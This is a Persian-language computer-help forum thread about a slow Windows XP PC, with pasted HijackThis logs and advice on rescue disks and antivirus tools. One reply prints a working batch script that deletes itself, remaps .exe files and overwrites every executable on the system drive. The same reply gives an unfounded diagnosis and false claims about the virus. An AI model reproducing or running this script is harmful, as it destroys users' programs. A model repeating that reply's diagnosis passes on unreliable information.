مشاهده نسخه کامل
: ويروس ناشناخته كه با هيچ آني ويروسي پاك نميشه
سلام مدتي است كه ويروسي وارد كامپيوتر من شده كه باعث كندي شديد سيستم ميشه بطوري كه تا 90 درصد سرعت كامپيوتر را پايين مي آورد همه آنتي ويروسها راهم چك كردم حتي كسپر نسخه اوريجينال هم خريدم و نصب كردم فايده نداشت حتي بعد از نصب ويندوز بدون اينكه به درايو ديگه هم برم از روي سي دي آنتي ويروس را هم نصب كردم و روي فول اسكن گذاشتم باز هم فايده نداشت حتي آنتي مالوار و آنتي اسپاي وار هم نصب كردم ولي بي فايده بود اساتيد محترم ميتونن مونو كمك كنند ممنون مي شم
دوست عزیز رو چه حساب اصرار دارید که ویروس وجود دارد ؟ بعید به نظر میرسه که کاسپرسکی آپدیت شده نتونه ویروسی رو تشخیص بده . شاید مشکل شما سخت افزاری باشه ( مثلا از هارددیسک ) . بهتر هستش که از یک متخصص کمک بگیرید و این همه هزینه نکنید .
سلام مدتي است كه ويروسي وارد كامپيوتر من شده كه باعث كندي شديد سيستم ميشه بطوري كه تا 90 درصد سرعت كامپيوتر را پايين مي آورد همه آنتي ويروسها راهم چك كردم حتي كسپر نسخه اوريجينال هم خريدم و نصب كردم فايده نداشت حتي بعد از نصب ويندوز بدون اينكه به درايو ديگه هم برم از روي سي دي آنتي ويروس را هم نصب كردم و روي فول اسكن گذاشتم باز هم فايده نداشت حتي آنتي مالوار و آنتي اسپاي وار هم نصب كردم ولي بي فايده بود اساتيد محترم ميتونن مونو كمك كنند ممنون مي شم
سلام عزیز.../.
چه جالب این همه تست کردین با آنتی ویروسهای مختلف بعد آخر سر فهمیدید که باید تاپیک رو در بخش اورژانس سیستم های آلوده بزنین !:46:
خوب شما یک لوگ اینجا با این نرم افزار کوچک بزار تا از لحاظ ویروسی سیستمت بررسی بشه:
HijackThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
ضمنا بگین از کی این اتفاق افتاده ، برنامه هایی که اخیرا نصب کردین چی هست ؟
از حالت Safe mode هم به همین شکل هست ؟
سیستم عامل شما چی هست؟
Take Care:40:
با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
با سلام
من سیستمم ویندوز xp هست که چند وقته منوهای مختلف ارور میاد روش و هی باید close رو بزنم تا بره
ارور هایی مثل ::
1.exe
2.exe
7a.exe , ...
اینا چیه و چطور باید کاری کنم تا دیگه نیاد؟؟؟
راستی ویتدوزم که ریستارت میکنم کلی از این ارورر ها میاد و باید همشون رو ;g,c ;kl??
کمک کمک کمک کمک
سلام
دوست عزیز لطفا پست قبلیم رو مطالعه کنین و لوگ اون نرم افزار که لینک دادم رو بزارین اینجا به صورت یک فایل TEXT
Take Care:40:
با سلام
دوست گرامی ویروسی که سیستم شما گرفته کدش به این صورته
rem ---------------------------------
rem Self Destruct
del /f /q %0
rem ---------------------------------
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
که اگه با فرمت .bat ذخیره بشه و بعد اجرا کنی در مرحله ی اول که خود ویرانی نام داره باعث میشه سرعت کامپیوترت افت کنه
در مرحله ی دوم هم تمام فایل های با فرمت .exe ویروسی شناخته میشن..
این ویروس مثل ویروس blaster هستش که قابل شناسایی نیست..
این ویروس بعد از اجرا خودشو تو پوشه ی system volume information همه ی درایو ها کپی میکنه....
واسه حذف کردنش دو راه بیشتر نداری
یا اینکه کل هارددتو فرمت کنی { که بعیده همچین کاری انجام بدی }
یا اینکه بوسیله ی لینوکس mandriva که بصورت پرتابل هستش بوت کنی بعد پوشه ی system volume information تمام درایو هاتو خالی کنی { تمام فایل ها رو حذف کن }
بعد ریستارت کن ببین چطوریه وضع سیستمت از نظر سرعت...
اگه بازم مشکل داشتی در خدمتم...
موفق باشی
سلام عزیز.../.
چه جالب این همه تست کردین با آنتی ویروسهای مختلف بعد آخر سر فهمیدید که باید تاپیک رو در بخش اورژانس سیستم های آلوده بزنین !:46:
خوب شما یک لوگ اینجا با این نرم افزار کوچک بزار تا از لحاظ ویروسی سیستمت بررسی بشه:
HijackThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] dia.com%2Fdl%2F46bc67f1f0279bdfb3a1c3dde0f343f5%2F 4ee9c59d%2F100069011%2Fsoftware%2Fantivirus%2FHiJa ckThis.msi)
ضمنا بگین از کی این اتفاق افتاده ، برنامه هایی که اخیرا نصب کردین چی هست ؟
از حالت Safe mode هم به همین شکل هست ؟
سیستم عامل شما چی هست؟
Take Care:40:
با سلام به دوست عزيز من اينترنتم ر ا از مخابرات گرفتم و چون براي دانلود بعضي از نرم افزارها مجبور شدم از وي پي ان استفاده كنم از مخابرات تماس گرفتند گفتند اگه از ----- شكن استفاده كني ديگه كامپوترت بالا نمي اد و اچند روز بعداز اين تماس سيستم به وضع در اومد يك بار هارد را فرمت كردم درست شد ولي 2 هفته بعدش بازم اينتوري شد
با سلام به دوست عزيز من اينترنتم ر ا از مخابرات گرفتم و چون براي دانلود بعضي از نرم افزارها مجبور شدم از وي پي ان استفاده كنم از مخابرات تماس گرفتند گفتند اگه از ----- شكن استفاده كني ديگه كامپوترت بالا نمي اد و اچند روز بعداز اين تماس سيستم به وضع در اومد يك بار هارد را فرمت كردم درست شد ولي 2 هفته بعدش بازم اينتوري شد
اگه اونطوری بود که الان هیچ کس از اینترنت استفاده نمیکرد ، دوست من شما لوگ اون نرم افزاری که گزاشتم رو اینجا بزارین تا مشکلتون رو بررسی کنم به طور دقیق ، فقط کاری رو که میگم انجام بدین باقیش رو میگم.:20:
Take Care:40:
اگه اونطوری بود که الان هیچ کس از اینترنت استفاده نمیکرد ، دوست من شما لوگ اون نرم افزاری که گزاشتم رو اینجا بزارین تا مشکلتون رو بررسی کنم به طور دقیق ، فقط کاری رو که میگم انجام بدین باقیش رو میگم.:20:
Take Care:40:
با سلام خدمت دوست عزیز Dr.Smith برنامه ی که گفته بودید دانلودکردم ولی به علت سنگین بودن سیستم نتونستم کارهای که گفته بودید انجام دهم بالاخره یه هارد اگسترنال گرفتم و با مکافات اطلاعات هارد را انتقال دادم و هارد را فرمت کردم و دوباره پارتیشن بندی کردم سیستم دوباره مثل روز اول روبراه شد. اما اطلاعاتی که توی هارد اکسترنال هست بعضیهاش با اینکه 1 گیگ حجم داشتند الان 0 نشون میده حتی اگر اطلاعاتی هم دوباره تو بریزی فرقی نمیکنه و اوپن هم نمیشن و قابل پاک شدن هم نیستن ممکن همون ویروس داخل همین پوشه ها باشه .با آنتی ویروس هم چک کردم چیزی نشون نداد .نظرتون در این باره چیه و چه پیشنهادی مکنید با تشکر از شما
با سلام خدمت دوست عزیز Dr.Smith برنامه ی که گفته بودید دانلودکردم ولی به علت سنگین بودن سیستم نتونستم کارهای که گفته بودید انجام دهم بالاخره یه هارد اگسترنال گرفتم و با مکافات اطلاعات هارد را انتقال دادم و هارد را فرمت کردم و دوباره پارتیشن بندی کردم سیستم دوباره مثل روز اول روبراه شد. اما اطلاعاتی که توی هارد اکسترنال هست بعضیهاش با اینکه 1 گیگ حجم داشتند الان 0 نشون میده حتی اگر اطلاعاتی هم دوباره تو بریزی فرقی نمیکنه و اوپن هم نمیشن و قابل پاک شدن هم نیستن ممکن همون ویروس داخل همین پوشه ها باشه .با آنتی ویروس هم چک کردم چیزی نشون نداد .نظرتون در این باره چیه و چه پیشنهادی مکنید با تشکر از شما
فکر کنم شبیه به مشکل هارد اکسترنال شما رو داشتم ، ببینم شما وقتی اطلاعات الان میریزی روی هارد اکسترنال ، کلا پاک میشه به صورتی که اصلا نریختی و حتی مخفی سیستمی هم نشده دیگه ؟
اگه اینطوری هست ، به نظر من باید که یک چک دیسک روی هارد اکسترنالتون بزنین، ممکنه هنوز هم ویروس رو داشته باشین ضمنا ، اگه بازهم امکان داره لوگ بزارین ، اینطوری هیچ چیزی معلوم نیست.
Take Care:40:
با سلام خدمت دوست عزیز Dr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) باز هم مزاحمتان شدم این دفعه یک مشکل دیگه پیش اومده وقتی وارد شبکه میشم بدون اینکه صفحه ی باز کنم چراغ مودم فعال میشه شبیه زمانی که در حال دانلوده و سرعت اینترنتم به نصف تقلیل پیدا میکنه آنتی ویروسم هیچی نشنون نمیده با اینHijackThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] dia.com%2Fdl%2F46bc67f1f0279bdfb3a1c3dde0f343f5%2F 4ee9c59d%2F100069011%2Fsoftware%2Fantivirus%2FHiJa ckThis.msi) برنامه لوگو بزارم کاری میشه کرد؟
با سلام خدمت دوست عزیز Dr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) باز هم مزاحمتان شدم این دفعه یک مشکل دیگه پیش اومده وقتی وارد شبکه میشم بدون اینکه صفحه ی باز کنم چراغ مودم فعال میشه شبیه زمانی که در حال دانلوده و سرعت اینترنتم به نصف تقلیل پیدا میکنه آنتی ویروسم هیچی نشنون نمیده با اینHijackThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] dia.com%2Fdl%2F46bc67f1f0279bdfb3a1c3dde0f343f5%2F 4ee9c59d%2F100069011%2Fsoftware%2Fantivirus%2FHiJa ckThis.msi) برنامه لوگو بزارم کاری میشه کرد؟
سلام دوست عزیز..
توصیه ام به شما استفاده از برنامه های مانیتورینگ شبکه هستش، یک نمونه خوب از شرکت مایکروسافت :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بسته به نوع ویندوزتون ورژن موردنظر رو بگیرین.
اما میتونید لوگ HijackThis رو هم در تاپیک رفع کامل مشکل سیستمهای آلوده بزارین بزارین ، بله میشه تشخیص داد..
موفق باشین../.
fishdilo
04-02-2012, 03:17
با سلام خدمت دوست عزیز Dr.Smith برنامه ی که گفته بودید دانلودکردم ولی به علت سنگین بودن سیستم نتونستم کارهای که گفته بودید انجام دهم بالاخره یه هارد اگسترنال گرفتم و با مکافات اطلاعات هارد را انتقال دادم و هارد را فرمت کردم و دوباره پارتیشن بندی کردم سیستم دوباره مثل روز اول روبراه شد. اما اطلاعاتی که توی هارد اکسترنال هست بعضیهاش با اینکه 1 گیگ حجم داشتند الان 0 نشون میده حتی اگر اطلاعاتی هم دوباره تو بریزی فرقی نمیکنه و اوپن هم نمیشن و قابل پاک شدن هم نیستن ممکن همون ویروس داخل همین پوشه ها باشه .با آنتی ویروس هم چک کردم چیزی نشون نداد .نظرتون در این باره چیه و چه پیشنهادی مکنید با تشکر از شما
سلام
دوست عزیز Dr.Smith راهنمایی های لازم رو کرده اند، ولی اگر باز فکر می کنید که مشکل از ویروس هست:
با توجه به اینکه سیستم خیلی سنگینه و کاری نمی تونید بکنید:
اگر اینترنت پر سرعت دارید، از لینک زیر دیسک نجات کسپر رو بگیرید، حجم حدود 200 مگ
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدروی سی دی رایت کنید
با بوت سی دی بیایید بالا و سیستم رو چک کنید
داخل انجمن آموزش دیسک نجات کسپر هست، ولی نتونستم پیداش کنم، آموزش زیر خوبه:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدنهایتا" با ویندوز بیایید بالا و با Malwarebytes سیستم رو چک مجدد کنید تا خرابکاری هایی که ویندوز رو دچار مشکل کرده هم از بین ببرید، لینک دریافت Malwarebytes با حجم 9 مگ:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبا این کار شما 100% مطمئن می شوید که کامپیوترتان ویروسی نیست.
اگر هم باز مشکل حل نشد، مطمئن باشید که مشکل از ویروس نیست و چاره ی کار یه جای دیگه است.
البته بعد از این کار ها با توجه به اینکه ظاهرا" با تعویض ویندوز مشکل ندارید و یکبار عوض کرده اید، خوبه یه ویندوز جدید بزنید و ببینید مشکل حل میشه؟! یا :13:
اگر هم کسپر سنگینه و حال نمیده ، دیسک نجات های دیگه هم توی لینک زیر می تونید پیدا کنید که کم حجمتر هستند، اما یکیش کافیه:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
از راهنمای های اساتید محترم ممنونم حتما دستورات شما ر انجام داده و نتیجه را اطلاع میدهم باز هم ممنون
ببخشید به این شکل لوگ را قرار دادم
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:07:44 AM, on 2/3/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\DeviceVM\Browser Configuration Utility\BCU.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Internet Download Manager\IDMan.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Avira\AntiVir Desktop\avfwsvc.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\DeviceVM\Browser Configuration Utility\BCUService.exe
C:\Program Files\Gigabyte\EasySaver\ESSVR.EXE
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Avira\AntiVir Desktop\avmailc.exe
C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Internet Download Manager\IEMonitor.exe
C:\WINDOWS\system32\dllhost.exe
H:\LORD\Program1\Mozilla Firefox\firefox.exe
H:\LORD\Program1\Mozilla Firefox\plugin-container.exe
C:\Documents and Settings\xgdhkj\Desktop\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: SearchHook Class - {BC86E1AB-EDA5-4059-938F-CE307B0C6F0A} - C:\Program Files\DeviceVM\Browser Configuration Utility\AddressBarSearch.dll
O2 - BHO: IDM Helper - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files\Internet Download Manager\IDMIECC.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [BCU] "C:\Program Files\DeviceVM\Browser Configuration Utility\BCU.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Program Files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [IDMan] C:\Program Files\Internet Download Manager\IDMan.exe /onboot
O4 - HKUS\S-1-5-19\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O8 - Extra context menu item: Download all links with IDM - C:\Program Files\Internet Download Manager\IEGetAll.htm
O8 - Extra context menu item: Download with IDM - C:\Program Files\Internet Download Manager\IEExt.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{3A66008C-EE51-4A5B-A220-5337E5324354}: NameServer = 4.2.2.3
O17 - HKLM\System\CCS\Services\Tcpip\..\{3D1F7D65-CE8F-4CFC-8D13-48794A27C6E0}: NameServer = 217.218.155.155 217.218.127.127
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Avira FireWall (AntiVirFirewallService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avfwsvc.exe
O23 - Service: Avira Mail Protection (AntiVirMailService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avmailc.exe
O23 - Service: Avira Scheduler (AntiVirSchedulerService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira Realtime Protection (AntiVirService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Avira Web Protection (AntiVirWebService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
O23 - Service: AppleChargerSrv - Unknown owner - C:\WINDOWS\system32\AppleChargerSrv.exe
O23 - Service: Browser Configuration Utility Service (BCUService) - DeviceVM, Inc. - C:\Program Files\DeviceVM\Browser Configuration Utility\BCUService.exe
O23 - Service: ES lite Service for program management. (ES lite Service) - Unknown owner - C:\Program Files\Gigabyte\EasySaver\ESSVR.EXE
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
--
End of file - 6588 bytes
سلام دوست عزیز..
لوگتون بررسی شد.. آویرا رو هم که نصب کردین ، هیچ پروسس خاصی ندارین که توی روند کاری پهنای باند تاثیر بزاره مطمئن باشین.
اما چون فک کنم گفتین از مخابرات سرویس میگیرین ، باید با اطلاعتون برسونم که تقریبا از اول بهمن ماه پهنای باند مخابرات کاهش داده شد..و گاها یک سری اختلالات هم در چراغ مودم و قطعی و وصلی مشاهده میشه، خود من هم همین مشکل رو دارم، اما به زودی درست میشه مشکلی نیست.
راستی مشکل هنگ رو دارین هنوز ، اگه دارین راهنماییتون کنم.
شاد باشین../.
سلام دوست عزیز..
لوگتون بررسی شد.. آویرا رو هم که نصب کردین ، هیچ پروسس خاصی ندارین که توی روند کاری پهنای باند تاثیر بزاره مطمئن باشین.
اما چون فک کنم گفتین از مخابرات سرویس میگیرین ، باید با اطلاعتون برسونم که تقریبا از اول بهمن ماه پهنای باند مخابرات کاهش داده شد..و گاها یک سری اختلالات هم در چراغ مودم و قطعی و وصلی مشاهده میشه، خود من هم همین مشکل رو دارم، اما به زودی درست میشه مشکلی نیست.
راستی مشکل هنگ رو دارین هنوز ، اگه دارین راهنماییتون کنم.
شاد باشین../.
سلام خدمت دوست عزیزم از زحمتی به شما دادم معذرت میخواهم دستتون درد نکنه خیالم را راحت کردید.مشکل هنگ کردن هم با فرمت هدرد برطرف شده اما یکی از دوستانم به همین مشکل دچار شده که آدرس سایت را به او دادم تا از کمکهی شما بهرمند گردد. باز هم از شما ممنونم دوست عزیز.
با سلام خدمت دوست عزیزم Dr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) با عرض پوزش از مزاحمت دوباره خواستم ببینم میشه 2 آنتی ویروس را باهم نصب کرد ،بطور کلی کدام آنتی ویروسها باه مچ هستند مثلا اویرا با نود یا کسپر ........ یا کدام انتی ویروس مچ است؟ ممنون
با سلام خدمت دوست عزیزم Dr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) با عرض پوزش از مزاحمت دوباره خواستم ببینم میشه 2 آنتی ویروس را باهم نصب کرد ،بطور کلی کدام آنتی ویروسها باه مچ هستند مثلا اویرا با نود یا کسپر ........ یا کدام انتی ویروس مچ است؟ ممنون
خواهش میکنم مهربون :31:
نه شما دو تا محصول رو باهم نصب نکن عزیز ، معمولا هیچ دو محصولی با هم مچ نیستن ، اما مثلا شما میتونین که مثلا kaspersky anti virus رو درکنار فایروال کومودو نصب کنید روی سیستم اما به تنظیمات کمی حرفه ای نیاز داره اینکار
به نظر من شما همون آویرا یا کاسپر که برای آویرا : Avira internet security و یا کاسپر هم که
Kaspersky internet security رو نصب کنید و درکنار هر کدوم که نصب میکنین حتما برنامه ی MBAM رو نصب کنید
موفق باشی عزیز:11:
با سلام خدمت دوست عزیز Dr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) سیستم برادرم زمانی که ویندوز تازه نصب میکنی سرعتش عالی همینکه به اینترنت متصل میشی سرعت افت بسیار زیادی مکنه و این مشکل تا زمانی که دوباره ویندوز را دوباره نصب کنی ادامه داره حال با برنامه hijackthis اسکنی ازش کردم ، لطف کنید با توجه به اسکن انجام شده راهنمای لازم را برای رفع مشکل بیان بفرمایید ممنون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 09:04:35 ب.ظ, on 2012/03/23
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.20583)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe
C:\WINDOWS\Samsung\ComSMMgr\ssmmgr.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Hotspot Shield\bin\openvpnas.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe
C:\Program Files\Hotspot Shield\bin\hsswd.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Alcohol Soft (MRT)\Alcohol 120\StarWind\StarWindService.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Hotspot Shield\bin\openvpntray.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
D:\portabl\Free Download Manager\fdm.exe
D:\portabl\Video Convert Master\VideoConvertMaster.exe
c:\progra~1\thekmp~1\kmplayer.exe
D:\HHAMMID\Downloads\Software\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
